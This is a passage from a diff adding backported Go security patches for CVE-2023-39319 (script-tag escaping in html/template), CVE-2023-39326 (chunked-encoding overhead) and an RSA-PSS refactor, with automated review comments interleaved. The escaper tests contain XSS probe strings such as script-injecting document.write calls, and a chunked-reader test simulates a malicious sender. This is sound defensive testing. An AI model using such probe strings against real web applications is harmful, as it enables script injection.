108@@ -25,21 +25,23 @@ func _() {
109 _ = x[stateJSRegexp-14]
110 _ = x[stateJSBlockCmt-15]
111 _ = x[stateJSLineCmt-16]
112- _ = x[stateCSS-17]
113- _ = x[stateCSSDqStr-18]
114- _ = x[stateCSSSqStr-19]
115- _ = x[stateCSSDqURL-20]
116- _ = x[stateCSSSqURL-21]
117- _ = x[stateCSSURL-22]
118- _ = x[stateCSSBlockCmt-23]
119- _ = x[stateCSSLineCmt-24]
120- _ = x[stateError-25]
121- _ = x[stateDead-26]
122+ _ = x[stateJSHTMLOpenCmt-17]
123+ _ = x[stateJSHTMLCloseCmt-18]
124+ _ = x[stateCSS-19]
125+ _ = x[stateCSSDqStr-20]
126+ _ = x[stateCSSSqStr-21]
127+ _ = x[stateCSSDqURL-22]
128+ _ = x[stateCSSSqURL-23]
129+ _ = x[stateCSSURL-24]
130+ _ = x[stateCSSBlockCmt-25]
131+ _ = x[stateCSSLineCmt-26]
132+ _ = x[stateError-27]
133+ _ = x[stateDead-28]
134 }
135
136-const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSBqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateErrorstateDead"
137+const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSBqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateJSHTMLOpenCmtstateJSHTMLCloseCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateErrorstateDead"
138
139-var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 154, 167, 182, 196, 204, 217, 230, 243, 256, 267, 283, 298, 308, 317}
140+var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 154, 167, 182, 196, 214, 233, 241, 254, 267, 280, 293, 304, 320, 335, 345, 354}
141
142 func (i state) String() string {
143 if i >= state(len(_state_index)-1) {
144diff --git a/src/html/template/transition.go b/src/html/template/transition.go
145index 92eb351..12aa4c4 100644
146--- a/src/html/template/transition.go
147+++ b/src/html/template/transition.go
148@@ -14,32 +14,34 @@ import (
149 // the updated context and the number of bytes consumed from the front of the
150 // input.
151 var transitionFunc = [...]func(context, []byte) (context, int){
152- stateText: tText,
153- stateTag: tTag,
154- stateAttrName: tAttrName,
155- stateAfterName: tAfterName,
156- stateBeforeValue: tBeforeValue,
157- stateHTMLCmt: tHTMLCmt,
158- stateRCDATA: tSpecialTagEnd,
159- stateAttr: tAttr,
160- stateURL: tURL,
161- stateSrcset: tURL,
162- stateJS: tJS,
163- stateJSDqStr: tJSDelimited,
164- stateJSSqStr: tJSDelimited,
165- stateJSBqStr: tJSDelimited,
166- stateJSRegexp: tJSDelimited,
167- stateJSBlockCmt: tBlockCmt,
168- stateJSLineCmt: tLineCmt,
169- stateCSS: tCSS,
170- stateCSSDqStr: tCSSStr,
171- stateCSSSqStr: tCSSStr,
172- stateCSSDqURL: tCSSStr,
173- stateCSSSqURL: tCSSStr,
174- stateCSSURL: tCSSStr,
175- stateCSSBlockCmt: tBlockCmt,
176- stateCSSLineCmt: tLineCmt,
177- stateError: tError,
178+ stateText: tText,
179+ stateTag: tTag,
180+ stateAttrName: tAttrName,
181+ stateAfterName: tAfterName,
182+ stateBeforeValue: tBeforeValue,
183+ stateHTMLCmt: tHTMLCmt,
184+ stateRCDATA: tSpecialTagEnd,
185+ stateAttr: tAttr,
186+ stateURL: tURL,
187+ stateSrcset: tURL,
188+ stateJS: tJS,
189+ stateJSDqStr: tJSDelimited,
190+ stateJSSqStr: tJSDelimited,
191+ stateJSBqStr: tJSDelimited,
192+ stateJSRegexp: tJSDelimited,
193+ stateJSBlockCmt: tBlockCmt,
194+ stateJSLineCmt: tLineCmt,
195+ stateJSHTMLOpenCmt: tLineCmt,
196+ stateJSHTMLCloseCmt: tLineCmt,
197+ stateCSS: tCSS,
198+ stateCSSDqStr: tCSSStr,
199+ stateCSSSqStr: tCSSStr,
200+ stateCSSDqURL: tCSSStr,
201+ stateCSSSqURL: tCSSStr,
202+ stateCSSURL: tCSSStr,
203+ stateCSSBlockCmt: tBlockCmt,
204+ stateCSSLineCmt: tLineCmt,
205+ stateError: tError,
206 }
207
208 var commentStart = []byte("<!--")
209@@ -263,7 +265,7 @@ func tURL(c context, s []byte) (context, int) {
210
211 // tJS is the context transition function for the JS state.
212 func tJS(c context, s []byte) (context, int) {
213- i := bytes.IndexAny(s, "\"`'/")
214+ i := bytes.IndexAny(s, "\"`'/<-#")
215 if i == -1 {
216 // Entire input is non string, comment, regexp tokens.
217 c.jsCtx = nextJSCtx(s, c.jsCtx)
218@@ -293,6 +295,26 @@ func tJS(c context, s []byte) (context, int) {
219 err: errorf(ErrSlashAmbig, nil, 0, "'/' could start a division or regexp: %.32q", s[i:]),
220 }, len(s)
221 }
222+ // ECMAScript supports HTML style comments for legacy reasons, see Appendix
223+ // B.1.1 "HTML-like Comments". The handling of these comments is somewhat
224+ // confusing. Multi-line comments are not supported, i.e. anything on lines
225+ // between the opening and closing tokens is not considered a comment, but
226+ // anything following the opening or closing token, on the same line, is
227+ // ignored. As such we simply treat any line prefixed with "<!--" or "-->"
228+ // as if it were actually prefixed with "//" and move on.
229+ case '<':
230+ if i+3 < len(s) && bytes.Equal(commentStart, s[i:i+4]) {
231+ c.state, i = stateJSHTMLOpenCmt, i+3
232+ }
233+ case '-':
234+ if i+2 < len(s) && bytes.Equal(commentEnd, s[i:i+3]) {
235+ c.state, i = stateJSHTMLCloseCmt, i+2
236+ }
237+ // ECMAScript also supports "hashbang" comment lines, see Section 12.5.
238+ case '#':
239+ if i+1 < len(s) && s[i+1] == '!' {
240+ c.state, i = stateJSLineCmt, i+1
241+ }
242 default:
243 panic("unreachable")
244 }
245@@ -372,12 +394,12 @@ func tBlockCmt(c context, s []byte) (context, int) {
246 return c, i + 2
247 }
248
249-// tLineCmt is the context transition function for //comment states.
250+// tLineCmt is the context transition function for //comment states, and the JS HTML-like comment state.
251 func tLineCmt(c context, s []byte) (context, int) {
252 var lineTerminators string
253 var endState state
254 switch c.state {
255- case stateJSLineCmt:
256+ case stateJSLineCmt, stateJSHTMLOpenCmt, stateJSHTMLCloseCmt:
257 lineTerminators, endState = "\n\r\u2028\u2029", stateJS
258 case stateCSSLineCmt:
259 lineTerminators, endState = "\n\f\r", stateCSS
260--
2612.24.4
262
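Review bot: The `case '-':` branch in tJS matches `-->` wherever it occurs, while the comment above it speaks of lines "prefixed with" the token, and the new TestEscape case (`before-->boop` rendered as `before`) confirms that a mid-line match drops the rest of the line. That means a script in a template that writes a decrement followed by `>` without spaces, such as `n-->0`, would have the remainder of that line elided from the output. I would state this next to the case, e.g. `// NOTE: "-->" is matched anywhere on a line, not only at its start; the rest of the line is elided.`, and add a TestEscape entry that pins the behaviour for plain `<`, `-` and `#` bytes that do not begin a comment, since none of the new cases cover that path. The same position question applies to `case '#':`, which accepts `#!` anywhere in the JS state. tJS starts and ends outside the hunk, so how jsCtx is carried across these bytes cannot be judged from here.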
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch
new file mode 100644
index 0000000000..69106e3e05
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch
@@ -0,0 +1,230 @@
1From 2070531d2f53df88e312edace6c8dfc9686ab2f5 Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <bracewell@google.com>
3Date: Thu, 3 Aug 2023 12:28:28 -0700
4Subject: [PATCH] [release-branch.go1.20] html/template: properly handle
5 special tags within the script context
6
7The HTML specification has incredibly complex rules for how to handle
8"<!--", "<script", and "</script" when they appear within literals in
9the script context. Rather than attempting to apply these restrictions
10(which require a significantly more complex state machine) we apply
11the workaround suggested in section 4.12.1.3 of the HTML specification [1].
12
13More precisely, when "<!--", "<script", and "</script" appear within
14literals (strings and regular expressions, ignoring comments since we
15already elide their content) we replace the "<" with "\x3C". This avoids
16the unintuitive behavior that using these tags within literals can cause,
17by simply preventing the rendered content from triggering it. This may
18break some correct usages of these tags, but on balance is more likely
19to prevent XSS attacks where users are unknowingly either closing or not
20closing the script blocks where they think they are.
21
22Thanks to Takeshi Kaneko (GMO Cybersecurity by Ierae, Inc.) for
23reporting this issue.
24
25Fixes #62197
26Fixes #62397
27Fixes CVE-2023-39319
28
29[1] https://html.spec.whatwg.org/#restrictions-for-contents-of-script-elements
30
31Change-Id: Iab57b0532694827e3eddf57a7497ba1fab1746dc
32Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1976594
33Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
34Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
35Reviewed-by: Damien Neil <dneil@google.com>
36Run-TryBot: Roland Shoemaker <bracewell@google.com>
37Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2014621
38TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
39Reviewed-on: https://go-review.googlesource.com/c/go/+/526099
40TryBot-Result: Gopher Robot <gobot@golang.org>
41Run-TryBot: Cherry Mui <cherryyz@google.com>
42
43Upstream-Status: Backport from [https://github.com/golang/go/commit/2070531d2f53df88e312edace6c8dfc9686ab2f5]
44CVE: CVE-2023-39319
45Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
46---
47 src/html/template/context.go | 14 ++++++++++
48 src/html/template/escape.go | 26 ++++++++++++++++++
49 src/html/template/escape_test.go | 47 +++++++++++++++++++++++++++++++-
50 src/html/template/transition.go | 15 ++++++++++
51 4 files changed, 101 insertions(+), 1 deletion(-)
52
53diff --git a/src/html/template/context.go b/src/html/template/context.go
54index 4eb7891..feb6517 100644
55--- a/src/html/template/context.go
56+++ b/src/html/template/context.go
57@@ -168,6 +168,20 @@ func isInTag(s state) bool {
58 return false
59 }
60
61+// isInScriptLiteral returns true if s is one of the literal states within a
62+// <script> tag, and as such occurances of "<!--", "<script", and "</script"
63+// need to be treated specially.
64+func isInScriptLiteral(s state) bool {
65+ // Ignore the comment states (stateJSBlockCmt, stateJSLineCmt,
66+ // stateJSHTMLOpenCmt, stateJSHTMLCloseCmt) because their content is already
67+ // omitted from the output.
68+ switch s {
69+ case stateJSDqStr, stateJSSqStr, stateJSBqStr, stateJSRegexp:
70+ return true
71+ }
72+ return false
73+}
74+
75 // delim is the delimiter that will end the current HTML attribute.
76 type delim uint8
77
78diff --git a/src/html/template/escape.go b/src/html/template/escape.go
79index ad2ec69..de8cf6f 100644
80--- a/src/html/template/escape.go
81+++ b/src/html/template/escape.go
82@@ -10,6 +10,7 @@ import (
83 "html"
84 "internal/godebug"
85 "io"
86+ "regexp"
87 "text/template"
88 "text/template/parse"
89 )
90@@ -650,6 +651,26 @@ var delimEnds = [...]string{
91 delimSpaceOrTagEnd: " \t\n\f\r>",
92 }
93
94+var (
95+ // Per WHATWG HTML specification, section 4.12.1.3, there are extremely
96+ // complicated rules for how to handle the set of opening tags <!--,
97+ // <script, and </script when they appear in JS literals (i.e. strings,
98+ // regexs, and comments). The specification suggests a simple solution,
99+ // rather than implementing the arcane ABNF, which involves simply escaping
100+ // the opening bracket with \x3C. We use the below regex for this, since it
101+ // makes doing the case-insensitive find-replace much simpler.
102+ specialScriptTagRE = regexp.MustCompile("(?i)<(script|/script|!--)")
103+ specialScriptTagReplacement = []byte("\\x3C$1")
104+)
105+
106+func containsSpecialScriptTag(s []byte) bool {
107+ return specialScriptTagRE.Match(s)
108+}
109+
110+func escapeSpecialScriptTags(s []byte) []byte {
111+ return specialScriptTagRE.ReplaceAll(s, specialScriptTagReplacement)
112+}
113+
114 var doctypeBytes = []byte("<!DOCTYPE")
115
116 // escapeText escapes a text template node.
117@@ -708,6 +729,11 @@ func (e *escaper) escapeText(c context, n *parse.TextNode) context {
118 b.Write(s[written:cs])
119 written = i1
120 }
121+ if isInScriptLiteral(c.state) && containsSpecialScriptTag(s[i:i1]) {
122+ b.Write(s[written:i])
123+ b.Write(escapeSpecialScriptTags(s[i:i1]))
124+ written = i1
125+ }
126 if i == i1 && c.state == c1.state {
127 panic(fmt.Sprintf("infinite loop from %v to %v on %q..%q", c, c1, s[:i], s[i:]))
128 }
129diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
130index 5f41e52..0cacb20 100644
131--- a/src/html/template/escape_test.go
132+++ b/src/html/template/escape_test.go
133@@ -513,6 +513,21 @@ func TestEscape(t *testing.T) {
134 "<script>#! beep\n</script>",
135 "<script>\n</script>",
136 },
137+ {
138+ "Special tags in <script> string literals",
139+ `<script>var a = "asd < 123 <!-- 456 < fgh <script jkl < 789 </script"</script>`,
140+ `<script>var a = "asd < 123 \x3C!-- 456 < fgh \x3Cscript jkl < 789 \x3C/script"</script>`,
141+ },
142+ {
143+ "Special tags in <script> string literals (mixed case)",
144+ `<script>var a = "<!-- <ScripT </ScripT"</script>`,
145+ `<script>var a = "\x3C!-- \x3CScripT \x3C/ScripT"</script>`,
146+ },
147+ {
148+ "Special tags in <script> regex literals (mixed case)",
149+ `<script>var a = /<!-- <ScripT </ScripT/</script>`,
150+ `<script>var a = /\x3C!-- \x3CScripT \x3C/ScripT/</script>`,
151+ },
152 {
153 "CSS comments",
154 "<style>p// paragraph\n" +
155@@ -1501,8 +1516,38 @@ func TestEscapeText(t *testing.T) {
156 context{state: stateJS, element: elementScript},
157 },
158 {
159+ // <script and </script tags are escaped, so </script> should not
160+ // cause us to exit the JS state.
161 `<script>document.write("<script>alert(1)</script>");`,
162- context{state: stateText},
163+ context{state: stateJS, element: elementScript},
164+ },
165+ {
166+ `<script>document.write("<script>`,
167+ context{state: stateJSDqStr, element: elementScript},
168+ },
169+ {
170+ `<script>document.write("<script>alert(1)</script>`,
171+ context{state: stateJSDqStr, element: elementScript},
172+ },
173+ {
174+ `<script>document.write("<script>alert(1)<!--`,
175+ context{state: stateJSDqStr, element: elementScript},
176+ },
177+ {
178+ `<script>document.write("<script>alert(1)</Script>");`,
179+ context{state: stateJS, element: elementScript},
180+ },
181+ {
182+ `<script>document.write("<!--");`,
183+ context{state: stateJS, element: elementScript},
184+ },
185+ {
186+ `<script>let a = /</script`,
187+ context{state: stateJSRegexp, element: elementScript},
188+ },
189+ {
190+ `<script>let a = /</script/`,
191+ context{state: stateJS, element: elementScript, jsCtx: jsCtxDivOp},
192 },
193 {
194 `<script type="text/template">`,
195diff --git a/src/html/template/transition.go b/src/html/template/transition.go
196index 12aa4c4..3d2a37c 100644
197--- a/src/html/template/transition.go
198+++ b/src/html/template/transition.go
199@@ -214,6 +214,11 @@ var (
200 // element states.
201 func tSpecialTagEnd(c context, s []byte) (context, int) {
202 if c.element != elementNone {
203+ // script end tags ("</script") within script literals are ignored, so that
204+ // we can properly escape them.
205+ if c.element == elementScript && (isInScriptLiteral(c.state) || isComment(c.state)) {
206+ return c, len(s)
207+ }
208 if i := indexTagEnd(s, specialTagEndMarkers[c.element]); i != -1 {
209 return context{}, i
210 }
211@@ -353,6 +358,16 @@ func tJSDelimited(c context, s []byte) (context, int) {
212 inCharset = true
213 case ']':
214 inCharset = false
215+ case '/':
216+ // If "</script" appears in a regex literal, the '/' should not
217+ // close the regex literal, and it will later be escaped to
218+ // "\x3C/script" in escapeText.
219+ if i > 0 && i+7 <= len(s) && bytes.Compare(bytes.ToLower(s[i-1:i+7]), []byte("</script")) == 0 {
220+ i++
221+ } else if !inCharset {
222+ c.state, c.jsCtx = stateJS, jsCtxDivOp
223+ return c, i + 1
224+ }
225 default:
226 // end delimiter
227 if !inCharset {
228--
2292.24.4
230
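Review bot: The comment above `specialScriptTagRE` in escape.go describes the affected JS literals as "strings, regexs, and comments", but `isInScriptLiteral` in context.go deliberately leaves the comment states out, so the two descriptions disagree about what gets escaped. I would reword the former along the lines of `// ... when they appear in JS literals (i.e. strings and regexps; comment content is already elided from the output).` In tJSDelimited, `bytes.Compare(bytes.ToLower(s[i-1:i+7]), []byte("</script")) == 0` builds a lowered copy on every `/` in a regexp; `bytes.EqualFold(s[i-1:i+7], []byte("</script"))` expresses the same case-insensitive comparison without the allocation. tSpecialTagEnd and tJSDelimited both continue outside their hunks.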
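--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch
@@ -0,0 +1,181 @@
+From 6446af942e2e2b161c4ec1b60d9703a2b55dc4dd Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Tue, 7 Nov 2023 10:47:56 -0800
+Subject: [PATCH] [release-branch.go1.20] net/http: limit chunked data overhead
+
+The chunked transfer encoding adds some overhead to
+the content transferred. When writing one byte per
+chunk, for example, there are five bytes of overhead
+per byte of data transferred: "1\r\nX\r\n" to send "X".
+
+Chunks may include "chunk extensions",
+which we skip over and do not use.
+For example: "1;chunk extension here\r\nX\r\n".
+
+A malicious sender can use chunk extensions to add
+about 4k of overhead per byte of data.
+(The maximum chunk header line size we will accept.)
+
+Track the amount of overhead read in chunked data,
+and produce an error if it seems excessive.
+
+Updates #64433
+Fixes #64434
+Fixes CVE-2023-39326
+
+Change-Id: I40f8d70eb6f9575fb43f506eb19132ccedafcf39
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2076135
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit 3473ae72ee66c60744665a24b2fde143e8964d4f)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2095407
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/547355
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/6446af942e2e2b161c4ec1b60d9703a2b55dc4dd]
+CVE: CVE-2023-39326
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/net/http/internal/chunked.go | 36 +++++++++++++---
+ src/net/http/internal/chunked_test.go | 59 +++++++++++++++++++++++++++
+ 2 files changed, 89 insertions(+), 6 deletions(-)
+
+diff --git a/src/net/http/internal/chunked.go b/src/net/http/internal/chunked.go
+index f06e572..ddbaacb 100644
+--- a/src/net/http/internal/chunked.go
++++ b/src/net/http/internal/chunked.go
+@@ -39,7 +39,8 @@ type chunkedReader struct {
+ n uint64 // unread bytes in chunk
+ err error
+ buf [2]byte
+- checkEnd bool // whether need to check for \r\n chunk footer
++ checkEnd bool // whether need to check for \r\n chunk footer
++ excess int64 // "excessive" chunk overhead, for malicious sender detection
+ }
+
+ func (cr *chunkedReader) beginChunk() {
+@@ -49,10 +50,38 @@ func (cr *chunkedReader) beginChunk() {
+ if cr.err != nil {
+ return
+ }
++ cr.excess += int64(len(line)) + 2 // header, plus \r\n after the chunk data
++ line = trimTrailingWhitespace(line)
++ line, cr.err = removeChunkExtension(line)
++ if cr.err != nil {
++ return
++ }
+ cr.n, cr.err = parseHexUint(line)
+ if cr.err != nil {
+ return
+ }
++ // A sender who sends one byte per chunk will send 5 bytes of overhead
++ // for every byte of data. ("1\r\nX\r\n" to send "X".)
++ // We want to allow this, since streaming a byte at a time can be legitimate.
++ //
++ // A sender can use chunk extensions to add arbitrary amounts of additional
++ // data per byte read. ("1;very long extension\r\nX\r\n" to send "X".)
++ // We don't want to disallow extensions (although we discard them),
++ // but we also don't want to allow a sender to reduce the signal/noise ratio
++ // arbitrarily.
++ //
++ // We track the amount of excess overhead read,
++ // and produce an error if it grows too large.
++ //
++ // Currently, we say that we're willing to accept 16 bytes of overhead per chunk,
++ // plus twice the amount of real data in the chunk.
++ cr.excess -= 16 + (2 * int64(cr.n))
++ if cr.excess < 0 {
++ cr.excess = 0
++ }
++ if cr.excess > 16*1024 {
++ cr.err = errors.New("chunked encoding contains too much non-data")
++ }
+ if cr.n == 0 {
+ cr.err = io.EOF
+ }
+@@ -133,11 +162,6 @@ func readChunkLine(b *bufio.Reader) ([]byte, error) {
+ if len(p) >= maxLineLength {
+ return nil, ErrLineTooLong
+ }
+- p = trimTrailingWhitespace(p)
+- p, err = removeChunkExtension(p)
+- if err != nil {
+- return nil, err
+- }
+ return p, nil
+ }
+
+diff --git a/src/net/http/internal/chunked_test.go b/src/net/http/internal/chunked_test.go
+index d067165..b20747d 100644
+--- a/src/net/http/internal/chunked_test.go
++++ b/src/net/http/internal/chunked_test.go
+@@ -212,3 +212,62 @@ func TestChunkReadPartial(t *testing.T) {
+ }
+
+ }
++
++func TestChunkReaderTooMuchOverhead(t *testing.T) {
++ // If the sender is sending 100x as many chunk header bytes as chunk data,
++ // we should reject the stream at some point.
++ chunk := []byte("1;")
++ for i := 0; i < 100; i++ {
++ chunk = append(chunk, 'a') // chunk extension
++ }
++ chunk = append(chunk, "\r\nX\r\n"...)
++ const bodylen = 1 << 20
++ r := NewChunkedReader(&funcReader{f: func(i int) ([]byte, error) {
++ if i < bodylen {
++ return chunk, nil
++ }
++ return []byte("0\r\n"), nil
++ }})
++ _, err := io.ReadAll(r)
++ if err == nil {
++ t.Fatalf("successfully read body with excessive overhead; want error")
++ }
++}
++
++func TestChunkReaderByteAtATime(t *testing.T) {
++ // Sending one byte per chunk should not trip the excess-overhead detection.
++ const bodylen = 1 << 20
++ r := NewChunkedReader(&funcReader{f: func(i int) ([]byte, error) {
++ if i < bodylen {
++ return []byte("1\r\nX\r\n"), nil
++ }
++ return []byte("0\r\n"), nil
++ }})
++ got, err := io.ReadAll(r)
++ if err != nil {
++ t.Errorf("unexpected error: %v", err)
++ }
++ if len(got) != bodylen {
++ t.Errorf("read %v bytes, want %v", len(got), bodylen)
++ }
++}
++
++type funcReader struct {
++ f func(iteration int) ([]byte, error)
++ i int
++ b []byte
++ err error
++}
++
++func (r *funcReader) Read(p []byte) (n int, err error) {
++ if len(r.b) == 0 && r.err == nil {
++ r.b, r.err = r.f(r.i)
++ r.i++
++ }
++ n = copy(p, r.b)
++ r.b = r.b[n:]
++ if len(r.b) > 0 {
++ return n, nil
++ }
++ return n, r.err
++}
+--
+2.25.1
+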
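Review bot: Both new tests in the chunked_test.go part call `io.ReadAll`, which was only added to package io in Go 1.16, while this patch is carried under go-1.14, so the test file would presumably not compile against that tree. Use the older helper instead, `_, err := ioutil.ReadAll(r)` in TestChunkReaderTooMuchOverhead and `got, err := ioutil.ReadAll(r)` in TestChunkReaderByteAtATime, and confirm that `io/ioutil` is imported there, since the test file's import block is outside the hunk. This affects only the test build; the overhead accounting added to beginChunk in chunked.go does not depend on it.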
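--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch
@@ -0,0 +1,393 @@
+From 9baafabac9a84813a336f068862207d2bb06d255 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Wed, 1 Apr 2020 17:25:40 -0400
+Subject: [PATCH] crypto/rsa: refactor RSA-PSS signing and verification
+
+Cleaned up for readability and consistency.
+
+There is one tiny behavioral change: when PSSSaltLengthEqualsHash is
+used and both hash and opts.Hash were set, hash.Size() was used for the
+salt length instead of opts.Hash.Size(). That's clearly wrong because
+opts.Hash is documented to override hash.
+
+Change-Id: I3e25dad933961eac827c6d2e3bbfe45fc5a6fb0e
+Reviewed-on: https://go-review.googlesource.com/c/go/+/226937
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Gobot Gobot <gobot@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/9baafabac9a84813a336f068862207d2bb06d255]
+CVE: CVE-2023-45287 #Dependency Patch1
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/rsa/pss.go | 173 ++++++++++++++++++++++--------------------
+ src/crypto/rsa/rsa.go | 9 ++-
+ 2 files changed, 96 insertions(+), 86 deletions(-)
+
+diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
+index 3ff0c2f4d0076..f9844d87329a8 100644
+--- a/src/crypto/rsa/pss.go
++++ b/src/crypto/rsa/pss.go
+@@ -4,9 +4,7 @@
+
+ package rsa
+
+-// This file implements the PSS signature scheme [1].
+-//
+-// [1] https://www.emc.com/collateral/white-papers/h11300-pkcs-1v2-2-rsa-cryptography-standard-wp.pdf
++// This file implements the RSASSA-PSS signature scheme according to RFC 8017.
+
+ import (
+ "bytes"
+@@ -17,8 +15,22 @@ import (
+ "math/big"
+ )
+
++// Per RFC 8017, Section 9.1
++//
++// EM = MGF1 xor DB || H( 8*0x00 || mHash || salt ) || 0xbc
++//
++// where
++//
++// DB = PS || 0x01 || salt
++//
++// and PS can be empty so
++//
++// emLen = dbLen + hLen + 1 = psLen + sLen + hLen + 2
++//
++
+ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byte, error) {
+- // See [1], section 9.1.1
++ // See RFC 8017, Section 9.1.1.
++
+ hLen := hash.Size()
+ sLen := len(salt)
+ emLen := (emBits + 7) / 8
+@@ -30,7 +42,7 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ // 2. Let mHash = Hash(M), an octet string of length hLen.
+
+ if len(mHash) != hLen {
+- return nil, errors.New("crypto/rsa: input must be hashed message")
++ return nil, errors.New("crypto/rsa: input must be hashed with given hash")
+ }
+
+ // 3. If emLen < hLen + sLen + 2, output "encoding error" and stop.
+@@ -40,8 +52,9 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ }
+
+ em := make([]byte, emLen)
+- db := em[:emLen-sLen-hLen-2+1+sLen]
+- h := em[emLen-sLen-hLen-2+1+sLen : emLen-1]
++ psLen := emLen - sLen - hLen - 2
++ db := em[:psLen+1+sLen]
++ h := em[psLen+1+sLen : emLen-1]
+
+ // 4. Generate a random octet string salt of length sLen; if sLen = 0,
+ // then salt is the empty string.
+@@ -69,8 +82,8 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ // 8. Let DB = PS || 0x01 || salt; DB is an octet string of length
+ // emLen - hLen - 1.
+
+- db[emLen-sLen-hLen-2] = 0x01
+- copy(db[emLen-sLen-hLen-1:], salt)
++ db[psLen] = 0x01
++ copy(db[psLen+1:], salt)
+
+ // 9. Let dbMask = MGF(H, emLen - hLen - 1).
+ //
+@@ -81,47 +94,57 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ // 11. Set the leftmost 8 * emLen - emBits bits of the leftmost octet in
+ // maskedDB to zero.
+
+- db[0] &= (0xFF >> uint(8*emLen-emBits))
++ db[0] &= 0xff >> (8*emLen - emBits)
+
+ // 12. Let EM = maskedDB || H || 0xbc.
+- em[emLen-1] = 0xBC
++ em[emLen-1] = 0xbc
+
+ // 13. Output EM.
+ return em, nil
+ }
+
+ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
++ // See RFC 8017, Section 9.1.2.
++
++ hLen := hash.Size()
++ if sLen == PSSSaltLengthEqualsHash {
++ sLen = hLen
++ }
++ emLen := (emBits + 7) / 8
++ if emLen != len(em) {
++ return errors.New("rsa: internal error: inconsistent length")
++ }
++
+ // 1. If the length of M is greater than the input limitation for the
+ // hash function (2^61 - 1 octets for SHA-1), output "inconsistent"
+ // and stop.
+ //
+ // 2. Let mHash = Hash(M), an octet string of length hLen.
+- hLen := hash.Size()
+ if hLen != len(mHash) {
+ return ErrVerification
+ }
+
+ // 3. If emLen < hLen + sLen + 2, output "inconsistent" and stop.
+- emLen := (emBits + 7) / 8
+ if emLen < hLen+sLen+2 {
+ return ErrVerification
+ }
+
+ // 4. If the rightmost octet of EM does not have hexadecimal value
+ // 0xbc, output "inconsistent" and stop.
+- if em[len(em)-1] != 0xBC {
++ if em[emLen-1] != 0xbc {
+ return ErrVerification
+ }
+
+ // 5. Let maskedDB be the leftmost emLen - hLen - 1 octets of EM, and
+ // let H be the next hLen octets.
+ db := em[:emLen-hLen-1]
+- h := em[emLen-hLen-1 : len(em)-1]
++ h := em[emLen-hLen-1 : emLen-1]
+
+ // 6. If the leftmost 8 * emLen - emBits bits of the leftmost octet in
+ // maskedDB are not all equal to zero, output "inconsistent" and
+ // stop.
+- if em[0]&(0xFF<<uint(8-(8*emLen-emBits))) != 0 {
++ var bitMask byte = 0xff >> (8*emLen - emBits)
++ if em[0] & ^bitMask != 0 {
+ return ErrVerification
+ }
+
+@@ -132,37 +155,30 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
+
+ // 9. Set the leftmost 8 * emLen - emBits bits of the leftmost octet in DB
+ // to zero.
+- db[0] &= (0xFF >> uint(8*emLen-emBits))
++ db[0] &= bitMask
+
++ // If we don't know the salt length, look for the 0x01 delimiter.
+ if sLen == PSSSaltLengthAuto {
+- FindSaltLength:
+- for sLen = emLen - (hLen + 2); sLen >= 0; sLen-- {
+- switch db[emLen-hLen-sLen-2] {
+- case 1:
+- break FindSaltLength
+- case 0:
+- continue
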